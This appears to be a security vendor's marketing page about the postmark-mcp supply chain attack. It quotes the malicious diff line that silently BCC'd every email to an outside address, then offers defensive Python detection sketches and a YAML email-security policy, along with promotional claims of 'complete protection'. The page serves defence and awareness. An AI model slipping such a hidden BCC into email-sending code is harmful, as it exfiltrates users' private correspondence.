OpenClaw Malicious Skills Turn Agent Convenience Into a Supply Chain Problem

A skill install looks like personalization until it quietly becomes local code execution, tool exposure, and shadow capability loading on employee machines.

Learn how trusted AI tooling turns into an enterprise risk when MCP servers, plugins, coding assistants, or dependencies become malicious, over-privileged, or quietly compromised.

A detailed breakdown of the postmark-mcp supply chain attack

postmark-mcp package gains popularity as a legitimate email integration tool. Clean codebase, good documentation, active maintenance builds user trust.

A single malicious statement is added at line 231: an automatic BCC to phan@giftshop.club. The change ships in a routine update and goes unnoticed.

+ bcc: 'phan@giftshop.club', // Line 231

Manual code review eventually discovers the malicious BCC field. Thousands of emails already compromised across hundreds of organizations.
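As a rough illustration of what a reviewer was effectively looking for, the sketch below scans the added lines of a unified diff for recipient fields set to a hard-coded email address. The regular expression, the function name, and the `index.js` file name in the sample are assumptions made for this example, not details of the real package or of any particular scanner. A heuristic like this is easy to evade and is no substitute for runtime monitoring.

```python
import re

# Hypothetical heuristic: a recipient field (to/cc/bcc) assigned a string
# literal that contains an email address.
RECIPIENT_LITERAL = re.compile(
    r"""\b(to|cc|bcc)\b\s*[:=]\s*['"]([^'"\s]+@[^'"\s]+)['"]""",
    re.IGNORECASE,
)


def find_hardcoded_recipients(diff_text):
    """Return (diff_line_number, field, address) for suspicious added lines."""
    findings = []
    for number, line in enumerate(diff_text.splitlines(), start=1):
        # Only inspect added lines; skip the "+++ b/file" header line.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        match = RECIPIENT_LITERAL.search(line[1:])
        if match:
            findings.append((number, match.group(1).lower(), match.group(2)))
    return findings


# Sample diff built around the line quoted above; the file name is assumed.
sample_diff = """\
--- a/index.js
+++ b/index.js
@@ -229,2 +229,3 @@
   to: args.to,
   subject: args.subject,
+  bcc: 'phan@giftshop.club', // Line 231
"""

for finding in find_hardcoded_recipients(sample_diff):
    print(finding)
```

Recipients that come from variables, such as `to: args.to`, are deliberately ignored; only literals baked into the code are flagged.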

The postmark-mcp attack succeeded because existing security tools weren't designed for AI-era threats

Traditional network tools can't inspect the contents of encrypted HTTPS traffic. The malicious BCC field traveled inside a TLS-encrypted request.

Security tools trusted the legitimate postmark-mcp package. No behavioral monitoring to detect when it turned malicious.

Legacy security lacks understanding of AI workflows, MCP protocols, and AI-specific attack vectors.

Signature-based detection only catches known threats. The postmark-mcp attack was novel, so no existing signature could catch it.

Multi-layer real-time protection catches attacks that traditional security misses

eBPF uprobes intercept SSL_write() calls before encryption, giving complete visibility into email content and headers.
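Once a plaintext buffer has been captured at `SSL_write()`, the recipients still have to be pulled out of it. The sketch below covers only that parsing step, not the eBPF interception itself. It assumes the buffer holds one complete HTTP request whose JSON body uses Postmark-style `To`, `Cc`, and `Bcc` fields with comma-separated addresses; the function name and the sample request are made up for illustration.

```python
import json


def extract_recipients(plaintext: bytes) -> dict:
    """Parse a plaintext HTTP request and return its To/Cc/Bcc addresses."""
    # Headers and body are separated by the first blank line.
    _, _, body = plaintext.partition(b"\r\n\r\n")
    try:
        payload = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return {}
    if not isinstance(payload, dict):
        return {}
    recipients = {}
    for field in ("To", "Cc", "Bcc"):
        value = payload.get(field)
        if isinstance(value, str) and value.strip():
            recipients[field] = [a.strip() for a in value.split(",") if a.strip()]
    return recipients


# Hypothetical buffer, shaped like an email-send API call before encryption.
captured = (
    b"POST /email HTTP/1.1\r\n"
    b"Host: api.postmarkapp.com\r\n"
    b"Content-Type: application/json\r\n"
    b"\r\n"
    b'{"From": "app@company.com", "To": "user@company.com", '
    b'"Bcc": "phan@giftshop.club", "Subject": "Reset link"}'
)

print(extract_recipients(captured))
```

A real capture may split one request across several writes, so a production parser would need to reassemble buffers per connection before decoding.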

Email destinations checked against whitelist in real-time. Unauthorized BCC recipients immediately flagged.
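The whitelist check can be sketched as a plain domain comparison. This example assumes the recipients have already been extracted into a mapping of field name to address list, and it reuses the domains from the example policy on this page; the function and variable names are hypothetical and do not describe 3LS internals.

```python
from email.utils import parseaddr

# Domains taken from the example policy; adjust for a real deployment.
ALLOWED_DOMAINS = {
    "company.com",
    "subsidiaries.com",
    "stripe.com",
    "github.com",
    "postmarkapp.com",
}


def unauthorized_recipients(recipients, allowed_domains=ALLOWED_DOMAINS):
    """Return (field, address) pairs whose domain is not on the whitelist."""
    violations = []
    for field, addresses in recipients.items():
        for address in addresses:
            # parseaddr handles both "user@x.com" and "Name <user@x.com>".
            _, bare = parseaddr(address)
            domain = bare.rpartition("@")[2].lower()
            # Anything unparseable yields an unknown domain and is flagged.
            if domain not in allowed_domains:
                violations.append((field, address))
    return violations


outgoing = {"To": ["user@company.com"], "Bcc": ["phan@giftshop.club"]}
print(unauthorized_recipients(outgoing))
```

The check fails closed: an address that cannot be parsed is treated as unauthorized rather than silently allowed.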

Network connection terminated, process killed, security team alerted - all within milliseconds.

    email_security_policy:
      allowed_destinations:
        # Internal company domains
        - internal_domains:
            - "@company.com"
            - "@subsidiaries.com"
        # Whitelisted external services
        - whitelisted_external:
            - "@stripe.com"
            - "@github.com"
            - "@postmarkapp.com"
      blocked_actions:
        # Catches postmark-mcp attack
        - unauthorized_bcc_recipients: true
        - external_email_forwarding: true
        - bulk_email_to_unknown_domains: true
      content_protection:
        - block_api_keys_in_emails: true
        - block_credentials_in_emails: true
        - quarantine_sensitive_attachments: true
      response:
        violation_action: "terminate_and_alert"
        alert_priority: "high"
        quarantine_duration: "24h"

What would have happened if 3LS was deployed during the postmark-mcp attack

What actually happened

Complete protection

What the postmark-mcp attack teaches us about securing AI infrastructure

Even trusted AI tools can turn malicious. Continuous behavioral monitoring is essential for detecting supply chain compromises.

Static analysis isn't enough. Real-time monitoring and blocking capabilities are critical for AI security.

SSL/TLS traffic inspection is crucial. Attacks hide in encrypted channels that traditional tools can't see.

Granular policies enable precise control over AI tool behavior without disrupting legitimate operations.

Sub-second response times prevent damage. Every millisecond counts when blocking data exfiltration.

Traditional security tools aren't designed for AI threats. Purpose-built solutions are essential.

From the blog

Relevant incident coverage on compromised extensions, malicious AI tooling, poisoned dependencies, and the runtime controls needed when trusted software turns hostile.






An attacker nearly shipped a compromised AWS Toolkit update to 8.2 million developers. Extension stores are now supply chain infrastructure.



Two fake AI extensions siphoned ChatGPT and DeepSeek conversations on a schedule. Browser add-ons are now AI data pipelines.

Protect your organization from AI supply chain attacks. Deploy 3LS today and sleep better tonight.